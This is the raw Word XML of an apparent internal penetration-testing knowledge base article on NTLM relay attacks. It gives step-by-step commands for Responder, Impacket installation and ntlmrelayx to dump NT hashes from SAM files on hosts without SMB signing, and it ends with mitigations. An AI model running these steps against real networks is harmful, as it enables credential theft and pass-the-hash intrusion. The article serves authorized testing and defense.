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BC278" w14:textId="60B85847" w:rsidR="000D1D0B" w:rsidRDefault="004164AC" w:rsidP="00B94CB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NTLM Relay Attacks</w:t>
      </w:r>
      <w:r w:rsidR="00941DF4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> v1: Dumping SAM files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56606A08" w14:textId="77777777" w:rsidR="00E142D0" w:rsidRDefault="00E142D0" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFA8C88" w14:textId="77777777" w:rsidR="00E142D0" w:rsidRPr="0069514E" w:rsidRDefault="00E142D0" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How does it work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE19B8" w14:textId="255A46B3" w:rsidR="00E142D0" w:rsidRDefault="00E142D0" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004164AC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">When broadcast traffic such as LLMNR/NB-NS/WPAD is active on an internal network, it is possible to take hashes captured by responder and relay them directly to </w:t>
      </w:r>
      <w:r w:rsidR="00E17D26">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>other machines</w:t>
      </w:r>
      <w:r w:rsidR="004164AC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. The end result is potentially authenticated access without eve</w:t>
      </w:r>
      <w:r w:rsidR="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00941DF4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> having to crack any passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7F67C5" w14:textId="4E6A958B" w:rsidR="004B7AB5" w:rsidRDefault="004B7AB5" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidR="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> this attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires SMB signing to be disabled on the target of the relay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D794B" w14:textId="40F78FDE" w:rsidR="00C121A8" w:rsidRPr="0069514E" w:rsidRDefault="00C121A8" w:rsidP="00E142D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How do I use it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15996622" w14:textId="69F7D69A" w:rsidR="00CE75F6" w:rsidRDefault="00CE75F6" w:rsidP="00CE75F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE75F6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Determine whether</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> any hosts have SMB signing disabled; this can be done through Nessus, or by running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>-security-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>mode.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C27B498" w14:textId="148480D4" w:rsidR="004B7AB5" w:rsidRPr="00CE75F6" w:rsidRDefault="004B7AB5" w:rsidP="00CE75F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Save the IPs of targets with signing disabled to a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5302F6BB" w14:textId="62627BED" w:rsidR="00E142D0" w:rsidRPr="004B7AB5" w:rsidRDefault="00E17D26" w:rsidP="00C121A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 xml:space="preserve">Configure </w:t>
      </w:r>
      <w:r w:rsidR="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Responder not to listen to SMB and HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> by editing 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/share/responder/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Responder.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F64834" w14:textId="2CC1EFFB" w:rsidR="004B7AB5" w:rsidRPr="004B7AB5" w:rsidRDefault="004B7AB5" w:rsidP="004B7AB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>Run t</w:t>
      </w:r>
      <w:r w:rsidR="00E25675">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>he following: responder –F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> –I eth0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233DD818" w14:textId="4FCF7320" w:rsidR="00E17D26" w:rsidRDefault="00E17D26" w:rsidP="00E17D26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 xml:space="preserve">Install the latest version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF6001" w14:textId="53A96E93" w:rsidR="00E17D26" w:rsidRPr="00E17D26" w:rsidRDefault="00E17D26" w:rsidP="00E17D26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 xml:space="preserve">pip install ldap3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dnspython</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C2F7507" w14:textId="7DAFC852" w:rsidR="00E17D26" w:rsidRPr="00E17D26" w:rsidRDefault="00E17D26" w:rsidP="00E17D26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 xml:space="preserve">pip install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ldapdomaindump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2603DFDC" w14:textId="48815FAC" w:rsidR="00E17D26" w:rsidRPr="00E17D26" w:rsidRDefault="00E17D26" w:rsidP="00E17D26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clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B840CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://github.com/CoreSecurity/impacket.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FCAD797" w14:textId="59366651" w:rsidR="00E17D26" w:rsidRPr="004B7AB5" w:rsidRDefault="00E17D26" w:rsidP="004B7AB5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>cd (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory) &amp;&amp; python setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B5A41" w14:textId="097E21C5" w:rsidR="004B7AB5" w:rsidRDefault="004B7AB5" w:rsidP="004B7AB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 another terminal/tab, r</w:t>
      </w:r>
      <w:r w:rsidRPr="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">un the following: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ntlmrelayx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00814EF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> -of (file name to save captured hashes</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00814EF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to) </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B7AB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (target file from step 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FFDDC5" w14:textId="6DFFFCC6" w:rsidR="0069514E" w:rsidRDefault="004B7AB5" w:rsidP="0069514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By default, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ntlmrelayx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> will dump NT hashes from the target’s SAM file</w:t>
      </w:r>
      <w:r w:rsidR="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the screen, and to a file in the directory it is run from; if successful, those NT hashes can be reused in pass-the-hash attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B396FD" w14:textId="77777777" w:rsidR="00814EF6" w:rsidRDefault="00814EF6" w:rsidP="0069514E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25BC4BC5" w14:textId="5BB43A41" w:rsidR="00814EF6" w:rsidRPr="0069514E" w:rsidRDefault="0069514E" w:rsidP="0069514E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069514E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the most basic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ntlmrelayx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack; it can also take </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> co</w:t>
      </w:r>
      <w:r w:rsidR="00814EF6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">mmands to create shells, as documented in this KB: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00814EF6" w:rsidRPr="00214ECD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>\\clt-fs01\nio\MASS\05. Knowledge Base Articles\NTLM Relay attacks v2 R0.01.docx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="788B9443" w14:textId="77777777" w:rsidR="00DA2524" w:rsidRPr="00DF726B" w:rsidRDefault="00DA2524" w:rsidP="00DA2524">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF726B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3C255" w14:textId="19AC5F6B" w:rsidR="00DA2524" w:rsidRDefault="00E17D26" w:rsidP="00E17D2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Mitigate LLMNR/NB-NS/WPAD weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43E048" w14:textId="6F20E045" w:rsidR="00E17D26" w:rsidRPr="00E17D26" w:rsidRDefault="00E17D26" w:rsidP="00E17D2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Enable SMB signing on all devices that use SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A02F13F" w14:textId="77777777" w:rsidR="00DA2524" w:rsidRDefault="00C57FF0" w:rsidP="00DA252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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3FDBF" w14:textId="399D2395" w:rsidR="0069514E" w:rsidRDefault="00814EF6" w:rsidP="00DA2524">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="0069514E" w:rsidRPr="00B840CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BC679C7" w14:textId="46E81EF7" w:rsidR="00C57FF0" w:rsidRPr="0069514E" w:rsidRDefault="00814EF6" w:rsidP="00DA2524">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00DF726B" w:rsidRPr="00DF726B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00C57FF0" w:rsidRPr="0069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0C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="707A6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45E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94D08350"/>
    <w:lvl w:ilvl="0" w:tplc="FB8AA2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F066B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CD6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91A3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430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92810"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAF69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2B"/>
    <w:rsid w:val="0008647E"/>
    <w:rsid w:val="000D0753"/>
    <w:rsid w:val="000D1D0B"/>
    <w:rsid w:val="004164AC"/>
    <w:rsid w:val="004B7AB5"/>
    <w:rsid w:val="0069514E"/>
    <w:rsid w:val="00814EF6"/>
    <w:rsid w:val="0090616E"/>
    <w:rsid w:val="00941DF4"/>
    <w:rsid w:val="009F69BA"/>
    <w:rsid w:val="00A96441"/>
    <w:rsid w:val="00B94CB3"/>
    <w:rsid w:val="00C121A8"/>
    <w:rsid w:val="00C57FF0"/>
    <w:rsid w:val="00CE75F6"/>
    <w:rsid w:val="00DA112B"/>
    <w:rsid w:val="00DA2524"/>
    <w:rsid w:val="00DF726B"/>
    <w:rsid w:val="00E142D0"/>
    <w:rsid w:val="00E17D26"/>
    <w:rsid w:val="00E25675"/>
    <w:rsid w:val="00F4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B7B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF2C5103-2754-4D6A-9220-1F60F8E7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1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1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64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4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4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4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t3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes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\\clt-fs01\nio\MASS\05.%20Knowledge%20Base%20Articles\NTLM%20Relay%20attacks%20v2%20R0.01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reSecurity/impacket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ox-it.com/en/insights/blogs/blog/inside-windows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31236-DEB2-4F77-AA54-92896C2D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Keil</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Thompson</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-04-27T17:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-14T15:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>